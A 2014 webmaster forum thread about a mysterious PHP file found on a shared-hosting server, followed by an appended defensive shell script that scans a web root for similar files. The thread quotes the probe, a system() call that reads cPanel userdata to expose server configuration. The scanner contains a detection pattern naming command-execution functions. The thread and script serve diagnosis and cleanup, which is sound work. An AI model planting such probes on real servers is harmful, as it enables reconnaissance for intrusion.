
Webmaster General Forum

    
Mysterious file on my server
virtualreality

5+ Year Member



 
Msg#: 4646963 posted 7:51 am on Feb 20, 2014 (gmt 0)

Hello, yesterday a mysterious file appeared on my server - sadfsdfsdf.php. The host says they don't know anything about how it happened but I don't trust them because their customer service is really bad. The content of the file is:


<?PHP echo system('FILES=/var/cpanel/userdata/myusernamehere/*;for i in $FILES;do egrep "servername|documentroot" $i | awk \'{print $1,$2}\' | egrep "^servername|^documentroot";echo ;done'); ?>

Can anyone translate what this code means? Many thanks!

 

phranque

WebmasterWorld Administrator, WebmasterWorld Top Contributor of All Time, 10+ Year Member, Top Contributors Of The Month



 
Msg#: 4646963 posted 10:52 am on Feb 20, 2014 (gmt 0)

This script could be used to expose information about your web server configuration.

Essentially it means - print out the first two fields of every row that contains "servername" or "documentroot" in any file in the /var/cpanel/userdata/myusernamehere/ directory.

virtualreality

5+ Year Member



 
Msg#: 4646963 posted 11:16 am on Feb 20, 2014 (gmt 0)

Thanks. Is that something the server people put there and do not want to say they did? Or could it be a hack? If so, what benefit can a hacker have from this info?

lucy24

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, Top Contributors Of The Month



 
Msg#: 4646963 posted 10:45 pm on Feb 20, 2014 (gmt 0)

I can't imagine the server administrators asking for information that they already have. Unless they're testing code-- and they wouldn't do that on some random customer's site!

For the hacker it's a preliminary inquiry. The information itself may or may not be useful; what they really want to know is whether they're able to get the information in the first place.

Hacking comes in many forms. What you've got here is a two-step approach. First comes the data collection, like your file, or checking whether they're able to "PUT" a file. If the first test comes up positive, they'll be back for bigger and nastier ventures.

I assume you removed the file the instant you found it. Did it come back?

phranque

WebmasterWorld Administrator, WebmasterWorld Top Contributor of All Time, 10+ Year Member, Top Contributors Of The Month



 
Msg#: 4646963 posted 12:20 am on Feb 21, 2014 (gmt 0)

Not only that, it tells the hacker you have a cPanel installation, which would allow them to take advantage of a potential cPanel vulnerability.

virtualreality

5+ Year Member



 
Msg#: 4646963 posted 12:48 pm on Feb 21, 2014 (gmt 0)

Yes I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

lucy24

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, Top Contributors Of The Month



 
Msg#: 4646963 posted 1:31 pm on Feb 21, 2014 (gmt 0)

The host says they don't know anything about how it happened but I don't trust them

:: twiddling thumbs ::

virtualreality

5+ Year Member



 
Msg#: 4646963 posted 1:55 pm on Feb 21, 2014 (gmt 0)

Their exact reply was:

It is important to remember that when it comes to the security of your site, it is your responsibility to make sure that none of the files you upload can be hacked. The server is secure, and I assure that is not how any hacker got in, if that is what happened. If they did get it, it was through your files that you uploaded. It is highly recommended that you determine if this file is intended or not, and then make sure that you always secure your files, to insure that hackers are not able to break in through the files and upload malware. Thank you.

lucy24

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, Top Contributors Of The Month



 
Msg#: 4646963 posted 9:27 pm on Feb 21, 2014 (gmt 0)

They think it's your fault your site got hacked? Well, maybe if your FTP password is "password" and your username* is "user" ...


* Notice how in movies-- the ones where they get the password within three guesses-- they never, ever have to figure out the username first?

Samizdata

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 4646963 posted 10:19 pm on Feb 21, 2014 (gmt 0)

I removed the file and it did not come back. I also changed the password. But what else can I do to prevent further problems?

Consider how they got your username and password in the first place.

One obvious possibility is a trojan on your computer.

...

Jonesy

5+ Year Member



 
Msg#: 4646963 posted 10:22 pm on Feb 23, 2014 (gmt 0)

Consider how they got your username and password in the first place.
One obvious possibility is a trojan on your computer.

Another possibility is using the same username and password
in many other sites, and one of them got cracked badly.
Jonesy
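
As a follow-up to the cleanup question in this thread, here is an added example (not written by any of the posters) of a triage scan that looks through a web root for other PHP files that shell out or read the cPanel userdata path, the way the probe file did. The function names, the pattern list and the sample tree are assumptions constructed for the illustration.

```shell
#!/bin/sh
# Added example, not from the thread. All paths and files are constructed.

# PHP calls that run OS commands (matched as whole function names, so
# curl_exec() is not flagged), plus the cPanel path the probe file read.
PATTERN='(^|[^[:alnum:]_])(system|exec|shell_exec|passthru|popen|proc_open)[[:space:]]*\(|/var/cpanel/userdata'

# scan_webroot DIR: print "path<TAB>line" for the first hit in each PHP file.
scan_webroot() {
    find "$1" -type f \( -iname '*.php' -o -iname '*.phtml' \) -print |
    while IFS= read -r f; do
        hit=$(grep -n -i -E "$PATTERN" "$f" | head -n 1 | cut -d: -f1)
        if [ -n "$hit" ]; then
            printf '%s\t%s\n' "$f" "$hit"
        fi
    done
}

# make_sample: build a throwaway web root (constructed) and print its path.
make_sample() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/lib" "$d/uploads"
    # Ordinary page: no command execution.
    printf '%s\n' '<?php echo "hello"; ?>' > "$d/index.php"
    # curl_exec() is an HTTP call, not a shell call: must not be flagged.
    printf '%s\n' '<?php $r = curl_exec($ch); ?>' > "$d/lib/http.php"
    # Same shape as the file from the thread (command body shortened).
    printf '%s\n' "<?PHP echo system('FILES=/var/cpanel/userdata/exampleuser/*; ...'); ?>" > "$d/sadfsdfsdf.php"
    # Not a PHP file: outside the scan's scope.
    printf '%s\n' "system('id')" > "$d/uploads/note.txt"
    printf '%s\n' "$d"
}

# Demo run on the constructed tree: only sadfsdfsdf.php is reported.
demo=$(make_sample) && scan_webroot "$demo"
rm -rf "$demo"
```

A hit is a reason to open the file, not a verdict: legitimate applications also call these functions, and a file can run commands in ways this pattern does not cover.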
